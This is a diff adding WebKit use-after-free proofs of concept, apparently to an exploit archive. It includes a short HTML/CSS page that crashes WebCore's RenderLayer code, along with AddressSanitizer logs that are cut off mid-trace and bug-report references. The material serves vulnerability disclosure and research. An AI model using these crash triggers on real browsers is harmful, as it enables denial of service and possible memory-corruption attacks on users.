+    #3 0x10e1987dc in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1027dc)
+    #4 0x1191cde69 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<496u>, WebCore::SVGTRefElement>(bmalloc::api::IsoHeap<WebCore::SVGTRefElement>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3d6be69)
+    #5 0x1191be66d in WebCore::SVGTRefElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3d5c66d)
+    #6 0x116d44b58 in WebCore::trefConstructor(WebCore::QualifiedName const&, WebCore::Document&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x18e2b58)
+    #7 0x116cc8f9b in WebCore::SVGElementFactory::createElement(WebCore::QualifiedName const&, WebCore::Document&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1866f9b)
+    #8 0x1178aa25e in WebCore::Document::createElement(WebCore::QualifiedName const&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244825e)
+    #9 0x117efd090 in WebCore::HTMLConstructionSite::createElement(WebCore::AtomicHTMLToken&, WTF::AtomicString const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9b090)
+    #10 0x117efce03 in WebCore::HTMLConstructionSite::insertForeignElement(WebCore::AtomicHTMLToken&&, WTF::AtomicString const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9ae03)
+    #11 0x117f48b12 in WebCore::HTMLTreeBuilder::processTokenInForeignContent(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae6b12)
+    #12 0x117f47ce7 in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae5ce7)
+    #13 0x117f015cc in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f5cc)
+    #14 0x117f0115a in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f15a)
+    #15 0x117f00364 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9e364)
+    #16 0x117f01ed7 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9fed7)
+    #17 0x11789ac2e in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2438c2e)
+    #18 0x118190ab3 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2eab3)
+    #19 0x11815a1e9 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf81e9)
+    #20 0x11829c0c7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e3a0c7)
+    #21 0x118298b4e in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e36b4e)
+    #22 0x11823018e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce18e)
+    #23 0x1078af87b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
+    #24 0x1078b3e06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
+    #25 0x1078b30fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
+    #26 0x106e94ea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
+    #27 0x106c07b7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
+    #28 0x106c0901e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)
+    #29 0x10e1253c7 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8f3c7)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const
+Shadow bytes around the buggy address:
+  0x1c2a00012170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2a00012180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2a00012190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2a000121a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2a000121b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x1c2a000121c0: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2a000121d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2a000121e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2a000121f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
+  0x1c2a00012200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x1c2a00012210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==69919==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186925
+Apple product security report ID: 693724716
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45486.html b/exploits/multiple/dos/45486.html
new file mode 100644
index 000000000..95bdacf81
--- /dev/null
+++ b/exploits/multiple/dos/45486.html
@@ -0,0 +1,178 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of the latest WebKit source on OSX.
+
+PoC:
+
+=================================================================
+-->
+
+<style>
+#htmlvar00005, noframes, * { diplay: inline; padding-top: 0vw; -webkit-column-count: 41; transition-delay: }
+body::first-letter { box-flex-group: -webkit-background-size: contain; -webkit-opacity: 0.716727864979; }
+#htmlvar00001, .class1 { 1vmax; display: contents; left: transform-style: inherit; -webkit-text-orientation: sideways; end }
+</style>
+<span class="class1" defer="defer">IYnxA?LQYP}</span>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==25159==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200003d572 at pc 0x00065122aeac bp 0x7ffee162f750 sp 0x7ffee162f748
+READ of size 6 at 0x61200003d572 thread T0
+==25159==WARNING: invalid path to external symbolizer!
+==25159==WARNING: Failed to use and restart external symbolizer!
+    #0 0x65122aeab in WebCore::RenderLayer::updateDescendantDependentFlags(WTF::HashSet<WebCore::RenderObject const*, WTF::PtrHash<WebCore::RenderObject const*>, WTF::HashTraits<WebCore::RenderObject const*> >*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37ddeab)
+    #1 0x65122a768 in WebCore::RenderLayer::updateDescendantDependentFlags(WTF::HashSet<WebCore::RenderObject const*, WTF::PtrHash<WebCore::RenderObject const*>, WTF::HashTraits<WebCore::RenderObject const*> >*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37dd768)
+    #2 0x65122a768 in WebCore::RenderLayer::updateDescendantDependentFlags(WTF::HashSet<WebCore::RenderObject const*, WTF::PtrHash<WebCore::RenderObject const*>, WTF::HashTraits<WebCore::RenderObject const*> >*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37dd768)
+    #3 0x65122a768 in WebCore::RenderLayer::updateDescendantDependentFlags(WTF::HashSet<WebCore::RenderObject const*, WTF::PtrHash<WebCore::RenderObject const*>, WTF::HashTraits<WebCore::RenderObject const*> >*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37dd768)
+    #4 0x65122a768 in WebCore::RenderLayer::updateDescendantDependentFlags(WTF::HashSet<WebCore::RenderObject const*, WTF::PtrHash<WebCore::RenderObject const*>, WTF::HashTraits<WebCore::RenderObject const*> >*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37dd768)
+    #5 0x65122851f in WebCore::RenderLayer::updateLayerPositions(WebCore::RenderGeometryMap*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37db51f)
+    #6 0x6512281cf in WebCore::RenderLayer::updateLayerPositionsAfterLayout(WebCore::RenderLayer const*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37db1cf)
+    #7 0x650996886 in WebCore::FrameView::didLayout(WTF::WeakPtr<WebCore::RenderElement>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f49886)
+    #8 0x65098ad2e in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f3dd2e)
+    #9 0x6509a3ea2 in WebCore::FrameView::updateContentsSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f56ea2)
+    #10 0x650b551e3 in WebCore::ScrollView::updateScrollbars(WebCore::IntPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31081e3)
+    #11 0x650b57a0f in WebCore::ScrollView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x310aa0f)
+    #12 0x65099048b in WebCore::FrameView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f4348b)
+    #13 0x650986fc6 in WebCore::FrameView::adjustViewSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f39fc6)
+    #14 0x65098ac39 in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f3dc39)
+    #15 0x64fe9a989 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244d989)
+    #16 0x650791f77 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d44f77)
+    #17 0x6507901bc in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d431bc)
+    #18 0x64febd9b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24709b2)
+    #19 0x6504e5e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #20 0x65077670b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #21 0x65073fdeb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+    #22 0x650882097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
+    #23 0x65087eabe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
+    #24 0x650815f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
+    #25 0x648dec7cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
+    #26 0x648df0d2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
+    #27 0x648df002e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
+    #28 0x6483d8978 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3d8978)
+    #29 0x648151e2e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x151e2e)
+    #30 0x64815bbd6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15bbd6)
+    #31 0x65d43ec07 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fc07)
+    #32 0x65d43f686 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x90686)
+    #33 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #34 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+    #35 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
+    #36 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
+    #37 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #38 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #39 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #40 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #41 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #42 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #43 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #44 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #45 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #46 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #47 0x10e5cc4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #48 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x61200003d572 is located 50 bytes inside of 320-byte region [0x61200003d540,0x61200003d680)
+freed by thread T0 here:
+    #0 0x64c127fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x65d49dc12 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeec12)
+    #2 0x651296efe in WebCore::RenderLayerModelObject::willBeDestroyed() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3849efe)
+    #3 0x65131704d in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38ca04d)
+    #4 0x6515c6320 in WebCore::RenderTreeBuilder::destroy(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b79320)
+    #5 0x6515c6247 in WebCore::RenderTreeBuilder::destroy(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b79247)
+    #6 0x6515d05cf in WebCore::RenderTreeBuilder::FirstLetter::createRenderers(WebCore::RenderBlock&, WebCore::RenderText&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b835cf)
+    #7 0x6515ce87a in WebCore::RenderTreeBuilder::FirstLetter::updateAfterDescendants(WebCore::RenderBlock&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b8187a)
+    #8 0x6515ce649 in WebCore::RenderTreeBuilder::updateAfterDescendants(WebCore::RenderElement&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b81649)
+    #9 0x6515e320f in WebCore::RenderTreeUpdater::updateAfterDescendants(WebCore::Element&, WebCore::Style::ElementUpdates const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9620f)
+    #10 0x6515e3197 in WebCore::RenderTreeUpdater::popParent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b96197)
+    #11 0x6515e2357 in WebCore::RenderTreeUpdater::popParentsToDepth(unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b95357)
+    #12 0x6515e21cb in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b951cb)
+    #13 0x6515e170a in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9470a)
+    #14 0x64fe99cdd in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244ccdd)
+    #15 0x64fe9b351 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244e351)
+    #16 0x65098a879 in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f3d879)
+    #17 0x6509a3ea2 in WebCore::FrameView::updateContentsSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f56ea2)
+    #18 0x650b551e3 in WebCore::ScrollView::updateScrollbars(WebCore::IntPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31081e3)
+    #19 0x650b57a0f in WebCore::ScrollView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x310aa0f)
+    #20 0x65099048b in WebCore::FrameView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f4348b)
+    #21 0x650986fc6 in WebCore::FrameView::adjustViewSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f39fc6)
+    #22 0x65098ac39 in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f3dc39)
+    #23 0x64fe9a989 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244d989)
+    #24 0x650791f77 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d44f77)
+    #25 0x6507901bc in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d431bc)
+    #26 0x64febd9b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24709b2)
+    #27 0x6504e5e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #28 0x65077670b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #29 0x65073fdeb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+
+previously allocated by thread T0 here:
+    #0 0x64c127a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x65d49e124 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef124)
+    #3 0x65d49a82d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeb82d)
+    #4 0x65d3f9dcb in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4adcb)
+    #5 0x65d3f911a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4a11a)
+    #6 0x6512bf468 in WebCore::RenderLayer::operator new(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3872468)
+    #7 0x651296f44 in WebCore::RenderLayerModelObject::createLayer() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3849f44)
+    #8 0x651215c1c in WebCore::RenderLayerModelObject::styleDidChange(WebCore::StyleDifference, WebCore::RenderStyle const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37c8c1c)
+    #9 0x65121585d in WebCore::RenderInline::styleDidChange(WebCore::StyleDifference, WebCore::RenderStyle const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37c885d)
+    #10 0x6515d01b6 in WebCore::RenderTreeBuilder::FirstLetter::createRenderers(WebCore::RenderBlock&, WebCore::RenderText&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b831b6)
+    #11 0x6515ce87a in WebCore::RenderTreeBuilder::FirstLetter::updateAfterDescendants(WebCore::RenderBlock&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b8187a)
+    #12 0x6515ce649 in WebCore::RenderTreeBuilder::updateAfterDescendants(WebCore::RenderElement&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b81649)
+    #13 0x6515e320f in WebCore::RenderTreeUpdater::updateAfterDescendants(WebCore::Element&, WebCore::Style::ElementUpdates const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9620f)
